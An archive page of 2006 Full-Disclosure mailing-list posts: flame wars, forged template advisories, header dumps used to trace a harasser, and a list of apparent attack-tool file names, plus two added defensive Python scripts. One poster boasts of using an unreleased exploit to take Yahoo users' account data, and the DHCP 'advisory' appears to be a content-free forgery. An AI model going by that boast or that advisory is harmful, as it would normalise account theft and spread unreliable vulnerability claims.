  xyberpix
 
  Blog: http://blogs.securiteam.com
 
 
 
  On 29 Mar 2006, at 23:18, n3td3v wrote:
 
   Well actually breaking into systems and showing the result to
   Google Yahoo etc sure is a bigger buzz than blogging about current
   issues within the media that you currently blog about. Where's your
   hacker stories of breaking into systems, where's your unique/
   original posts that haven't been seen before in public? I
   throughout the years have been non-stop telling everyone of my
   war stories of what's been happening behind the scenes at the Yahoo
   security community. I mean, which scene do you belong to, apart
   from some guy who reads FD and then blogs about whatever is on the
   list. Don't you have your own stuff that's original/unique?
  
   On 3/29/06, xyberpix [EMAIL PROTECTED] wrote:
  
   Bwahahahahahahahahahahahahahaahahahahaha.
  
   To live in your world must be so much fun.
  
   xyberpix
  
   Blog: http://blogs.securiteam.com
  
  
  
   On 29 Mar 2006, at 22:20, n3td3v wrote:
  
And of course, you want to advertise that securiteam.com let you
set up a blog on their domain because they felt sorry for you. I
believe there's an e-mail link on the securiteam.com site for anyone
to ask for a blog, it's nothing special. How many corporate systems
and networks have you broken into, just as I thought...none.
   
On 3/29/06, xyberpix [EMAIL PROTECTED] wrote:

Seriously, this list was better with a certain someone not on it, can
we please go back to that way of life again?
   
xyberpix
   
Blog: http://blogs.securiteam.com
   
   
   
 

Re: [Full-disclosure] Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)

2006-03-25 Thread Stan Bubrouski
On 3/24/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 Posting a private email to a mailing list is pretty slimeball Ryan.
  Funny you would do such a thing when you lost your bullshit job at
 Security Focus over getting owned.

Sadly more and more people are posting off-list messages back to the
list to get themselves more attention (n3td3v).

-sb



Re: [Full-disclosure] Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)

2006-03-25 Thread Stan Bubrouski
On 3/25/06, Blue Boar [EMAIL PROTECTED] wrote:
 Stan Bubrouski wrote:
  On 3/24/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
  Posting a private email to a mailing list is pretty slimeball Ryan.
   Funny you would do such a thing when you lost your bullshit job at
  Security Focus over getting owned.
 
  Sadly more and more people are posting off-list messages back to the
  list to get themselves more attention (n3td3v).

 Except that I didn't.

 BB


Hehe I wasn't implying you did, those were actually the CC's on the
message I was replying to.  Sorry.

-sb



Re: [Full-disclosure] Industry calls on Microsoft to scrap Patch Tuesday for Critical flaws

2006-03-25 Thread Stan Bubrouski
On 3/25/06, n3td3v [EMAIL PROTECTED] wrote:

 I work with rogue employee vendors around the world to bring good Hack
 active solution about within the community, if you can't under stand that,

You work with rats and understand is one word.

 then you need to sit down and realise that the n3td3v group is the biggest
 thing you'll ever meet in your life time, in terms of rogue employees
 getting together to make their voice heard.


Just because you own AOL, Google, and Yahoo e-mail addresses does not
make you rogue employees.

 We can agree in that one guy, has many voices, if that helps your cause mr
 0x80!
 Or we can argue the crypto of the n3td3v group further if you wish to go
 down that road...


How about taking it off-list and not CC'ing the list back in for every message.

-sb



Re: [Full-disclosure] Phun! Search

2006-03-23 Thread Stan Bubrouski
How come when people make comments off-list you re-add FD to the
replies?  You are cancer.

On 3/23/06, n3td3v [EMAIL PROTECTED] wrote:
 I have exploit code for this issue, which the list won't be getting hold of.
 The disclosure was to show that I can ask the slurp robot to cache an
 account on the public index, so I can retrieve account information. I ask
 the code to cache a copy of 'x user', when 'x' is at critical information
 page to obtain access to the yahoo users account. Of course with such a good
 0-day, I use it seldom and only on specific targets like yahoo users with
 'paid' services and or Yahoo employees.



 On 3/22/06, Stan Bubrouski [EMAIL PROTECTED] wrote:
 How old are you?  Seriously.  I don't know whether you realize just
 how completely stupid you come off as to even people new in the
 security field.  You are a joke.  Quit filling this list with crap.
 BTW did you even check to see if Yahoo! will let you view OTHER
 people's account stuff?  Otherwise it seems pretty useless.

 -sb





[Full-disclosure] [Advisory] | [Thu Mar 16 13:38:05 EST 2006] | Off-by-one in ISC DHCP

2006-03-16 Thread stan . bubrouski



[Advisory] | [Thu Mar 16 13:38:05 EST 2006] | Off-by-one in ISC DHCP




1. DESCRIPTION
It is possible to make ISC DHCP crash by the use of malformed input.

2. WORKAROUND
This advisory has no workarounds regarding the vulnerability.
3. VENDOR RESPONSE
ISC DHCP had extended no explanation regarding this issue.



Re: [Full-disclosure] Advisory 2006-03-12 Gay Slut Overflow CRITICAL dismallest in Immunitysec Dave Aitel

2006-03-12 Thread Stan Bubrouski
Not to mention all the messages come through www.c0replay.net assuming
that part of the headers are accurate.  If you'll recall the same
domain was used to spoof a message from Steven Rakick on March 4th. 
Seems some little kiddie in the UK (assumption warning!) is going to
be paying some fines.  I wouldn't exactly call it smart to slander
dozens of people... and moderation has never seemed more necessary.

-sb

On 3/12/06, Nicob [EMAIL PROTECTED] wrote:
 On Sunday 12 March 2006 at 01:08 -0800, dismallest dismallest wrote:
  APPENDIX B. - References
  http://bantown.com/banforge/release.rar

 http://bantown.com/ : Our website was recently hacked [...]

 and

 http://64.233.179.104/search?q=cache:1F21krhKFHEJ:bantown.com/banforge/

 Index of /banforge

  Parent Directory          23-Feb-2006 22:51     -
  BPL.txt                   20-Aug-2005 15:08    4k
  LJiggaboo1.0.1rc2.tgz     21-Jan-2006 13:10  142k
  Ljflooder2.pl             07-Aug-2005 05:07    5k
  PhpBBreg-FIXEDLOL.py      08-Aug-2005 23:11    1k
  banbot.pl                 16-Aug-2005 11:36   15k
  fla.sh                    16-Aug-2005 11:22    2k
  flu.shot                  19-Aug-2005 11:04    3k
  gaffler3.tar.gz           09-Aug-2005 02:30  123k
  phpBBroke-0.1.tar.gz      09-Oct-2005 13:35  383k
  phpBBroke/                27-Sep-2005 16:47     -
  phpbb_captcha.c           24-Jan-2006 03:16   21k
  pw-lolercaust-0.2.tar.gz  10-Oct-2005 03:38    2k
  rsshithead.tgz


 Nicob



Re: [Full-disclosure] Gadievron flood

2006-03-12 Thread Stan Bubrouski
On 3/12/06, Gary Leons [EMAIL PROTECTED] wrote:
 Personally, I find the Gay Slut advisories a refreshing change from
 the crap Evron normally posts. But then, I kill filed him after his
 OMG I FOUND A LUNIX VIRUS thread, so maybe he's reduced the
 frequency of pathetic commentaries since then, I don't know.


If you bothered to look at any of the headers you'd see that Gadi
didn't post any of the messages.  They came from c0replay.net or
something rather.

 Hopefully some more subscribers will have kill filed him by now, and
 he'll get bored and go away, so at least some good may come of this
 spamminess.


Gadi has started some interesting discussions, but feel free to keep
trashing people's messages who post advisories not dealing with XSS on
here, god knows sensible posts ruin this list for the kids.

-sb

 Gary.


Re: [Full-disclosure] Advisory 2006-03-12 Gay Slut Overflow CRITICAL dismallest in Immunitysec Dave Aitel

2006-03-12 Thread Stan Bubrouski
Too bad they didn't resolve the problem more than a week ago when the
first spoofed messages were sent out (only 1 made it to FD I think).

Thanks for the update ad,

-sb

On 3/12/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:

 yep I have some little infos on this, the admin at c0replay showed me
 an .sql with a malicious script

 
 -- Dumping data for table `advisorytype`
 --

 INSERT INTO `advisorytype` VALUES (1, 'Directory Transversal', 'Remote
 exploitation of a directory traversal vulnerability in [product] could
 allow attackers to overwrite or view arbitrary files with
 user-supplied contents.');
 INSERT INTO `advisorytype` VALUES (2, 'DoS Vulnerability', 'Sending a
 specially crafted  malformed  packet to the services communication
 socket can create a loss of service.');
 INSERT INTO `advisorytype` VALUES (3, 'Integer Overflow', '[product]
 incorrectly parses integer data, and this can be used to execute
 arbitrary code.');
 INSERT INTO `advisorytype` VALUES (4, 'Heap Overflow', 'It is possible
 to make [product] crash or run arbitrary code by the use of malformed
 input.');
 INSERT INTO `advisorytype` VALUES (5, 'Buffer Overflow', 'It is
 possible to make [product] crash or run arbitrary code by the use of
 malformed input.');
 INSERT INTO `advisorytype` VALUES (6, 'Off-by-one', 'It is possible to
 make [product] crash by the use of malformed input.');
 INSERT INTO `advisorytype` VALUES (7, 'Local Privilege Escalation
 Vulnerability', '[product] incorrectly validates user input, making
 privilege escalation possible.');

 --

 --
 -- Table structure for table `fdmail`
 --

 CREATE TABLE `fdmail` (
  `id` int(10) NOT NULL auto_increment,
  `Name` varchar(100) NOT NULL default '',
  `Email` varchar(100) NOT NULL default '',
  PRIMARY KEY  (`id`)
 ) TYPE=MyISAM AUTO_INCREMENT=2958 ;

 --
 -- Dumping data for table `fdmail`
 --

 INSERT INTO `fdmail` VALUES (2078, 'Josh perrymon',
 '[EMAIL PROTECTED]');
 INSERT INTO `fdmail` VALUES (2077, '[EMAIL PROTECTED]',
 '[EMAIL PROTECTED]');
 INSERT INTO `fdmail` VALUES (2075, 'Dave Korn',
 '[EMAIL PROTECTED]');
 INSERT INTO `fdmail` VALUES (2076, 'str0ke', '[EMAIL PROTECTED]');
 INSERT INTO `fdmail` VALUES (2073, 'Morning Wood',
 '[EMAIL PROTECTED]');
 INSERT INTO `fdmail` VALUES (2074, 'Bipin Gautam',
 '[EMAIL PROTECTED]');

 etc etc etc
 ***

 I'm not sure but it looks like they have been hacked through the board
 with an sql injection, possible private bug I dunno but I know the
 maintainer of this website and they aren't responsible of this.


 Stan Bubrouski wrote:
  Not to mention all the messages come through www.c0replay.net
  assuming that part of the headers are accurate.  If you'll recall
  the same domain was used to spoof a message from Steven Rakick on
  March 4th. Seems some little kiddie in the UK (assumption warning!)
  is going to be paying some fines.  I wouldn't exactly call it smart
  to slander dozens of people... and moderation has never seemed more
  necessary.
 
  -sb
 
  On 3/12/06, Nicob [EMAIL PROTECTED] wrote:
  On Sunday 12 March 2006 at 01:08 -0800, dismallest dismallest wrote:
  APPENDIX B. - References
  http://bantown.com/banforge/release.rar
  http://bantown.com/ : Our website was recently hacked [...]
 
  and
 
  http://64.233.179.104/search?q=cache:1F21krhKFHEJ:bantown.com/banforge/
 
 
  Index of /banforge
 
  Parent Directory          23-Feb-2006 22:51     -
  BPL.txt                   20-Aug-2005 15:08    4k
  LJiggaboo1.0.1rc2.tgz     21-Jan-2006 13:10  142k
  Ljflooder2.pl             07-Aug-2005 05:07    5k
  PhpBBreg-FIXEDLOL.py      08-Aug-2005 23:11    1k
  banbot.pl                 16-Aug-2005 11:36   15k
  fla.sh                    16-Aug-2005 11:22    2k
  flu.shot                  19-Aug-2005 11:04    3k
  gaffler3.tar.gz           09-Aug-2005 02:30  123k
  phpBBroke-0.1.tar.gz      09-Oct-2005 13:35  383k
  phpBBroke/                27-Sep-2005 16:47     -
  phpbb_captcha.c           24-Jan-2006 03:16   21k
  pw-lolercaust-0.2.tar.gz  10-Oct-2005 03:38    2k
  rsshithead.tgz
 
 
  Nicob
 


___
Full-Disclosure - We
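
A defensive use of the template table quoted in this message, as an added example that is not part of the original posts: it turns each `advisorytype` description into a pattern and checks a list post against them, using the body of the "Off-by-one in ISC DHCP" post from earlier on this page as input. The function names and the numbered-heading rule are assumptions made for the example.

```python
import re

# Rows copied from the `advisorytype` dump quoted above (wrapped lines joined).
TEMPLATES = {
    1: ("Directory Transversal",
        "Remote exploitation of a directory traversal vulnerability in [product] "
        "could allow attackers to overwrite or view arbitrary files with "
        "user-supplied contents."),
    2: ("DoS Vulnerability",
        "Sending a specially crafted malformed packet to the services "
        "communication socket can create a loss of service."),
    3: ("Integer Overflow",
        "[product] incorrectly parses integer data, and this can be used to "
        "execute arbitrary code."),
    4: ("Heap Overflow",
        "It is possible to make [product] crash or run arbitrary code by the "
        "use of malformed input."),
    5: ("Buffer Overflow",
        "It is possible to make [product] crash or run arbitrary code by the "
        "use of malformed input."),
    6: ("Off-by-one",
        "It is possible to make [product] crash by the use of malformed input."),
    7: ("Local Privilege Escalation Vulnerability",
        "[product] incorrectly validates user input, making privilege "
        "escalation possible."),
}

# Body of the "Off-by-one in ISC DHCP" post that appears earlier on this page.
SAMPLE = """\
[Advisory] | [Thu Mar 16 13:38:05 EST 2006] | Off-by-one in ISC DHCP

1. DESCRIPTION
It is possible to make ISC DHCP crash by the use of malformed input.

2. WORKAROUND
This advisory has no workarounds regarding the vulnerability.
3. VENDOR RESPONSE
ISC DHCP had extended no explanation regarding this issue.
"""

# Assumption: section headings look like "1. DESCRIPTION" (number, dot, capitals).
HEADING = re.compile(r"^\s*\d+\.\s+[A-Z][A-Z ]+$")


def norm(text):
    """Collapse runs of whitespace so mail re-wrapping does not defeat matching."""
    return " ".join(text.split())


def compile_template(template):
    """Escape the fixed text and let the [product] slot match a short name."""
    parts = [re.escape(p) for p in norm(template).split("[product]")]
    return re.compile("(.{1,80}?)".join(parts), re.IGNORECASE)


COMPILED = {tid: (name, compile_template(t)) for tid, (name, t) in TEMPLATES.items()}


def sentences(body):
    """Yield normalised sentences; headings and blank lines end a section."""
    section = []
    for line in body.splitlines() + [""]:
        if HEADING.match(line) or not line.strip():
            text = norm(" ".join(section))
            section = []
            if text:
                yield from re.split(r"(?<=[.!?])\s+", text)
        else:
            section.append(line)


def classify(body):
    """Return (template id, type name, product) for every sentence that is an
    exact instance of one of the templates."""
    hits = []
    for sent in sentences(body):
        for tid, (name, rx) in COMPILED.items():
            m = rx.fullmatch(sent)
            if m:
                hits.append((tid, name, m.group(1) if m.groups() else None))
    return hits


if __name__ == "__main__":
    for hit in classify(SAMPLE):
        print(hit)
```

A hit only shows that a sentence is an instance of one of these templates; the message headers are still needed to establish where a post came from.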

Re: [Full-disclosure] For Sale: Security Vulnerability Database Company

2006-03-09 Thread Stan Bubrouski
Do you ever give up?  Only n3td3v would post that his google group,
which is merely an aggregation of lists like this one is a
vulnerability database... it's not.

-sb

On 3/8/06, System Outage [EMAIL PROTECTED] wrote:

 Hello security community,

 Why would someone buy a security vulnerability database company? There's
 already free security vulnerability databases out there. Try this one I
 recently found, you can search for anything you want
 http://groups.google.com/group/n3td3v and its free.

 system_outage
 -- Forwarded message --
 From: Jason Bergen
 Date: Mar 8, 2006 11:59 AM
 Subject: [Full-disclosure] For Sale: Security Vulnerability Database Company
 To: full-disclosure@lists.grok.org.uk


 Apologies if this email is not appropriate for this list.

 We have been appointed to facilitate the sale of company which has
 developed and maintains a security vulnerability database, thus are
 looking for potential buyers for our client.


 The company maintains a database of all security vulnerabilities, and
 the database is updated on a daily basis. The company may be of
 interest to organisations who are currently licensing a vulnerability
 database. In addition the company has developed some software
 applications built upon the vulnerability database.

 More details about the organisation are available on request by
 contacting me by email at [EMAIL PROTECTED]

 Regards
 Jason Bergen


Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge

2006-02-15 Thread Stan Bubrouski
On 2/15/06, Jerome Athias [EMAIL PROTECTED] wrote:
 $50,000 for reporting BSA that your neighbor uses an illegal version of
 Window$ !

That is entirely inaccurate.  The $5 reward with numerous strings
attached is for reporting a company using multiple pirated copies of
software, reporting your neighbor+ apparently yields no reward other
than flaming crap on your doorstep and RAT written on your windows :-P

-sb


 https://reporting.bsa.org/usa/home.aspx



Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge

2006-02-15 Thread Stan Bubrouski
haha wish you had I could sue you ;-)

-sb

On 2/15/06, str0ke [EMAIL PROTECTED] wrote:
 Class,

 I just made 50k reporting you ;)

 /str0ke

 On 2/15/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 
  nop totally wrong, I got 50k yesterday reporting my sister ..
 
  ;D
  Stan Bubrouski wrote:
   On 2/15/06, Jerome Athias [EMAIL PROTECTED] wrote:
   $50,000 for reporting BSA that your neighbor uses an illegal version of
   Window$ !
  
   That is entirely inaccurate.  The $5 reward with numerous strings
   attached is for reporting a company using multiple pirated copies of
   software, reporting your neighbor+ apparently yields no reward other
   than flaming crap on your doorstep and RAT written on your windows :-P
  
   -sb
  
   https://reporting.bsa.org/usa/home.aspx
  
  
  
  
 


Re: [Full-disclosure] Google creates SPAM haven

2006-02-11 Thread Stan Bubrouski
I was added to this group without permission as well.

-sb

On 2/11/06, Adam Laurie [EMAIL PROTECTED] wrote:
 I find it hard to believe that with all the resources at Google's
 disposal, they are unable to find technicians or project managers,
 designers, or whatever, that have any idea how the interweb works...
 Amazingly, despite years of SPAM being a huge problem, they have now
 created a system that allows spammers to set up mailing lists, add you
 to them unauthenticated, and then spam you by simply mailing the list
 and letting Google take care of the rest...

http://groups.google.co.in/intl/en/googlegroups/about.html

 A couple of days ago I got the following unsolicited message:

   [EMAIL PROTECTED] has added you to the hackers a to z group with this
  message:
 
  Fed up with worms, viruses and hackers messing with your computer? Want to
  know how they do it? How to defend? How to fight back? You take the blue
  pill and the story ends Take the red pill and I'll show you how deep the
  rabbit hole goes,

 Within half an hour I started to receive posts to the group (typical
 script-kiddie crap). At no point did I need to send a confirmation mail
 or hit a URL to say I wanted to be subscribed...

 Google's solution to this? I can block it in My subscriptions. WTF???
 So, as well as receiving unsolicited mail from Google (i.e., errr...
 SPAM), I'm now expected to go and subscribe to a service I have no
 interest in for the sole purpose of NOT receiving it Give me a
 frikkin break!

 cheers,
 Adam
 --
 Adam Laurie Tel: +44 (0) 20 7605 7000
 The Bunker Secure Hosting Ltd.  Fax: +44 (0) 20 7605 7099
 Shepherds Building  http://www.thebunker.net
 Rockley Road
 London W14 0DA  mailto:[EMAIL PROTECTED]
 UNITED KINGDOM  PGP key on keyservers



Re: [Full-disclosure] Google creates SPAM haven

2006-02-11 Thread Stan Bubrouski
Does anyone know any way to not allow people to add you to google
groups or just extricate yourself from it altogether?  I mean
honestly it's more than just a little intrusive, people constantly sign
you up for groups you don't want to be in, your messages get posted to
Google groups without your permission, along with your code etc...
terms of service don't trump copyright laws either...

-sb

On 2/11/06, Stan Bubrouski [EMAIL PROTECTED] wrote:
 I was added to this group without permission as well.

 -sb

 On 2/11/06, Adam Laurie [EMAIL PROTECTED] wrote:
  I find it hard to believe that with all the resources at Google's
  disposal, they are unable to find technicians or project managers,
  designers, or whatever, that have any idea how the interweb works...
  Amazingly, despite years of SPAM being a huge problem, they have now
  created a system that allows spammers to set up mailing lists, add you
  to them unauthenticated, and then spam you by simply mailing the list
  and letting Google take care of the rest...
 
 http://groups.google.co.in/intl/en/googlegroups/about.html
 
  A couple of days ago I got the following unsolicited message:
 
[EMAIL PROTECTED] has added you to the hackers a to z group with this
   message:
  
   Fed up with worms, viruses and hackers messing with your computer? Want to
   know how they do it? How to defend? How to fight back? You take the blue
   pill and the story ends Take the red pill and I'll show you how deep the
   rabbit hole goes,
 
  Within half an hour I started to receive posts to the group (typical
  script-kiddie crap). At no point did I need to send a confirmation mail
  or hit a URL to say I wanted to be subscribed...
 
  Google's solution to this? I can block it in My subscriptions. WTF???
  So, as well as receiving unsolicited mail from Google (i.e., errr...
  SPAM), I'm now expected to go and subscribe to a service I have no
  interest in for the sole purpose of NOT receiving it Give me a
  frikkin break!
 
  cheers,
  Adam
  --
  Adam Laurie Tel: +44 (0) 20 7605 7000
  The Bunker Secure Hosting Ltd.  Fax: +44 (0) 20 7605 7099
  Shepherds Building  http://www.thebunker.net
  Rockley Road
  London W14 0DA  mailto:[EMAIL PROTECTED]
  UNITED KINGDOM  PGP key on keyservers
 


Re: [Full-disclosure] Google creates SPAM haven

2006-02-11 Thread Stan Bubrouski
On 2/11/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 On Sat, 11 Feb 2006 12:32:43 EST, Stan Bubrouski said:
  you up for groups you don't want to be in, your messages get posted to
  Google groups without your permission, along with your code etc...

 Messages and code being reposted is hardly a Google-specific problem.


hehe no doubt

 It's a potential problem *anytime* you hit that 'Send' button.


Yeah but typically lists and whatnot these days require confirmation,
Google just blindly subscribes you when anyone requests it, I'm
assuming, since I didn't subscribe to any of the hacker or porn groups
I have to keep removing myself from.  Frankly if some Indian hacker
group thinks of me as l33t they have no idea what they're talking
about ;-)

-sb


Re: [Full-disclosure] Re: Bluetooth Activesync - requesting test

2006-02-09 Thread Stan Bubrouski
On 2/9/06, Dave Korn [EMAIL PROTECTED] wrote:
 Stan Bubrouski wrote:
  Ever since Greg disagreed with me in that ZoneAlarm thread Dave and I
  were arguing in, Greg has been forwarding all messages I send to the
  list back to me.

   Stan, it is possible you could be being manipulated by someone who's
 trying to bait you and Greg into a fight by forwarding you his postings in a
 spoofed/forged name; that sort of thing happens quite often on this list.

No check the headers they are below.


   As indeed do broken reflectors and autoreplybots and all sorts of
 non-malicious things.


He's forwarding them from both addresses he has subscribed to the list.

   And indeed sometimes flamewars erupt and someone does bombard someone else
 with posts from the list.


Yes and the person can unsubscribe or set rules to trash messages from
people they don't like rather than filling their mailboxes like 10
year old script kiddies.

   Have you checked the headers to see if they're coming from the same IP
 addresses he usually posts from?  It's worth making double sure what's
 actually going on.


Yes I did I wouldn't have bothered posting if I didn't, I'd expect
more from Greg though I'm starting to have my doubts about his
competence.

   Hey, a how-to of tracking headers would even make for an on-topic thread!


People on this list using posts to this list to harass other
contributors is on topic it's called full-disclosure not
full-intimidation.

Here are the partial headers judge for yourself:
Delivered-To: [EMAIL PROTECTED]
Received: by 10.54.78.4 with SMTP id a4cs21898wrb;
Wed, 8 Feb 2006 19:33:11 -0800 (PST)
Received: by 10.64.148.16 with SMTP id v16mr508287qbd;
Wed, 08 Feb 2006 19:33:10 -0800 (PST)
Return-Path: [EMAIL PROTECTED]
Received: from vscan02.westnet.com.au (vscan02.westnet.com.au [203.10.1.132])
by mx.gmail.com with ESMTP id q15si92451qbq.2006.02.08.19.33.08;
Wed, 08 Feb 2006 19:33:10 -0800 (PST)
Received-SPF: neutral (gmail.com: 203.10.1.132 is neither permitted
nor denied by best guess record for domain of [EMAIL PROTECTED])
Received: from localhost (localhost.localdomain [127.0.0.1])
by localhost (Postfix) with ESMTP id CD1D711B456
for [EMAIL PROTECTED]; Thu,  9 Feb 2006 11:33:07 +0800 (WST)
Received: from vscan02.westnet.com.au ([127.0.0.1])
 by localhost (vscan02.westnet.com.au [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id 07529-14 for [EMAIL PROTECTED];
 Thu,  9 Feb 2006 11:33:07 +0800 (WST)
Received: from P4 (dsl-220-235-109-182.nsw.westnet.com.au [220.235.109.182])
by vscan02.westnet.com.au (Postfix) with ESMTP id F001611B94C
for [EMAIL PROTECTED]; Thu,  9 Feb 2006 11:33:06 +0800 (WST)
Return-Receipt-To: Greg [EMAIL PROTECTED]
From: Greg [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: FW: Re: [Full-disclosure] Bluetooth Activesync - requesting test

And:
X-Gmail-Received: 9f257bbd2acc0b72366a3b169864544d27fde993
Delivered-To: [EMAIL PROTECTED]
Received: by 10.54.78.4 with SMTP id a4cs21924wrb;
Wed, 8 Feb 2006 19:34:53 -0800 (PST)
Received: by 10.65.121.15 with SMTP id y15mr2057023qbm;
Wed, 08 Feb 2006 19:34:49 -0800 (PST)
Return-Path: [EMAIL PROTECTED]
Received: from vscan03.westnet.com.au (vscan03.westnet.com.au [203.10.1.142])
by mx.gmail.com with ESMTP id q19si93451qbq.2006.02.08.19.34.48;
Wed, 08 Feb 2006 19:34:49 -0800 (PST)
Received-SPF: neutral (gmail.com: 203.10.1.142 is neither permitted
nor denied by best guess record for domain of
[EMAIL PROTECTED])
Received: from localhost (localhost.localdomain [127.0.0.1])
by localhost (Postfix) with ESMTP id CF11BB607E2
for [EMAIL PROTECTED]; Thu,  9 Feb 2006 11:34:46 +0800 (WST)
Received: from vscan03.westnet.com.au ([127.0.0.1])
 by localhost (vscan03.westnet.com.au [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id 20017-05-6 for [EMAIL PROTECTED];
 Thu,  9 Feb 2006 11:34:46 +0800 (WST)
Received: from P4 (dsl-220-235-109-182.nsw.westnet.com.au [220.235.109.182])
by vscan03.westnet.com.au (Postfix) with ESMTP id 179A6B60A61
for [EMAIL PROTECTED]; Thu,  9 Feb 2006 11:34:44 +0800 (WST)
Return-Receipt-To: Greg [EMAIL PROTECTED]
From: Greg [EMAIL PROTECTED]
To: [EMAIL PROTECTED]

Seems downright childish to me (talking about Greg not Dave, I
disagree with Dave but Dave I can respect).

Best Regards,
Stan Bubrouski

 cheers,
   DaveK
 --
 Can't think of a witty .sigline today


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
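
One way to do the header check discussed in this message, as an added example (not code from the thread): start at the hop your own mail server wrote, accept a lower Received line only when it was written by a relay you trust and that relay is the peer the hop above recorded, then compare the resulting client address across messages. The trusted relay set and the function names are assumptions; the header lines are taken from the two dumps above.

```python
import ipaddress
import re
from email import message_from_string

# Received lines from the two header dumps in the message above, re-folded with
# tabs and with the redacted "for [EMAIL PROTECTED]" clauses dropped.
MSG_A = """\
Received: by 10.54.78.4 with SMTP id a4cs21898wrb;
\tWed, 8 Feb 2006 19:33:11 -0800 (PST)
Received: from vscan02.westnet.com.au (vscan02.westnet.com.au [203.10.1.132])
\tby mx.gmail.com with ESMTP id q15si92451qbq.2006.02.08.19.33.08;
\tWed, 08 Feb 2006 19:33:10 -0800 (PST)
Received: from localhost (localhost.localdomain [127.0.0.1])
\tby localhost (Postfix) with ESMTP id CD1D711B456;
\tThu,  9 Feb 2006 11:33:07 +0800 (WST)
Received: from P4 (dsl-220-235-109-182.nsw.westnet.com.au [220.235.109.182])
\tby vscan02.westnet.com.au (Postfix) with ESMTP id F001611B94C;
\tThu,  9 Feb 2006 11:33:06 +0800 (WST)
Subject: FW: Re: [Full-disclosure] Bluetooth Activesync - requesting test

"""

MSG_B = """\
Received: by 10.54.78.4 with SMTP id a4cs21924wrb;
\tWed, 8 Feb 2006 19:34:53 -0800 (PST)
Received: from vscan03.westnet.com.au (vscan03.westnet.com.au [203.10.1.142])
\tby mx.gmail.com with ESMTP id q19si93451qbq.2006.02.08.19.34.48;
\tWed, 08 Feb 2006 19:34:49 -0800 (PST)
Received: from localhost (localhost.localdomain [127.0.0.1])
\tby localhost (Postfix) with ESMTP id CF11BB607E2;
\tThu,  9 Feb 2006 11:34:46 +0800 (WST)
Received: from P4 (dsl-220-235-109-182.nsw.westnet.com.au [220.235.109.182])
\tby vscan03.westnet.com.au (Postfix) with ESMTP id 179A6B60A61;
\tThu,  9 Feb 2006 11:34:44 +0800 (WST)

"""

# Assumption: the recipient trusts their own MX and the sender's ISP relays.
TRUSTED = {"mx.gmail.com", "vscan02.westnet.com.au", "vscan03.westnet.com.au"}

# "from <helo> (<reverse-dns> [<ip>])" as written by the receiving server.
FROM_RE = re.compile(r"\s*from\s+(\S+)\s+\((?:([^\s\[\]()]+)\s+)?\[([0-9A-Fa-f.:]+)\]\)")
BY_RE = re.compile(r"\bby\s+(\S+)")


def parse_hop(value):
    """Split one Received value into the claimed name, the recorded peer, and the writer."""
    f, b = FROM_RE.match(value), BY_RE.search(value)
    return {"helo": f.group(1) if f else None,   # what the client called itself
            "rdns": f.group(2) if f else None,   # name the server looked up
            "ip": f.group(3) if f else None,     # address the server saw
            "by": b.group(1).rstrip(";") if b else None}


def received_chain(raw):
    """Received headers in header order: newest hop first, oldest last."""
    return [parse_hop(v) for v in message_from_string(raw).get_all("Received", [])]


def origin(raw, trusted):
    """Deepest hop that is still backed by a trusted relay, or None."""
    last = None
    for hop in received_chain(raw):
        if hop["ip"] is None:
            continue          # internal handoff that records no peer address
        try:
            if ipaddress.ip_address(hop["ip"]).is_loopback:
                continue      # content filter on the same host, not a network hop
        except ValueError:
            break             # malformed address: stop trusting the chain here
        if hop["by"] not in trusted:
            break             # written by an unknown host, may be forged
        if last is not None and hop["by"] != last["rdns"]:
            break             # writer is not the peer the hop above recorded
        last = hop
    return last


def same_origin(raw_a, raw_b, trusted):
    """True when both messages trace back to the same verified client address."""
    a, b = origin(raw_a, trusted), origin(raw_b, trusted)
    return a is not None and b is not None and a["ip"] == b["ip"]


if __name__ == "__main__":
    print(origin(MSG_A, TRUSTED)["ip"], same_origin(MSG_A, MSG_B, TRUSTED))
```

The `helo` value (here `P4`) is chosen by the sending client and proves nothing; only the address a trusted relay recorded in brackets is evidence.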


Re: [Full-disclosure] Bluetooth Activesync - requesting test

2006-02-08 Thread Stan Bubrouski
Ever since Greg disagreed with me in that ZoneAlarm thread Dave and I
were arguing in, Greg has been forwarding all messages I send to the
list back to me.

Childish and Annoying are great ways to describe it since he could
easily automatically trash my messages if he doesn't want to read
them.

This started on the list, and hopefully this message will help end it
here.  I don't want to trash anyone's messages, even Greg's because
they could contain useful information.

Greg stop being a jackass.

-sb

On 2/8/06, Greg [EMAIL PROTECTED] wrote:
 OK this sounds screwy but if someone has the equipment, can you test and let
 us all know please?

 A PDA I was working on that had to be Activesync'd to one computer had the
 PDA name John rather than the standard name that comes with the PDA.
 Another PDA was already working Activesync. Both were over bluetooth
 encrypted. The other one was named Cheryl just for info's sake.

 Anyway, John was a new PDA of exactly the same make and model as Cheryl
 (Mortein syndrome) but what I didn't know and didn't look for, initially,
 was that the computer had been set up by someone else to ONLY allow
 connections from Cheryl and no other device and it was set in non
 discovery mode, that is, no other bluetooth device supposed to be able to
 find it. When I set John up, it autosync'd for 24 hours and stopped syncing
 again. I went back and did a thorough look and found that Cheryl was the
 only one allowed to connect bluetooth to the computer but John had,
 anyway.

 So this makes me wonder - and this is what I am asking help with - is it
 possible that bluetooth pairing, connection in total and autosync are all at
 risk if the same model PDA is used even though they are set up with
 different PDA names and even if settings are correct and are NOT supposed to
 allow connection from anything else? If it is, this is a worry.

 Of course, the alternative is that I stuffed something up, I know but for
 the life of me, I can't see what it is. If data is encrypted and only paired
 devices that are NAMED are allowed to connect, I would have thought that
 meant I shouldn't have been able to set the other PDA up but I did.

 Thanks for any info/help.

 Greg.



Re: [Full-disclosure] [ Secuobs - Advisory ] Bluetooth : DoS on Sony/Ericsson cell phones

2006-02-06 Thread Stan Bubrouski
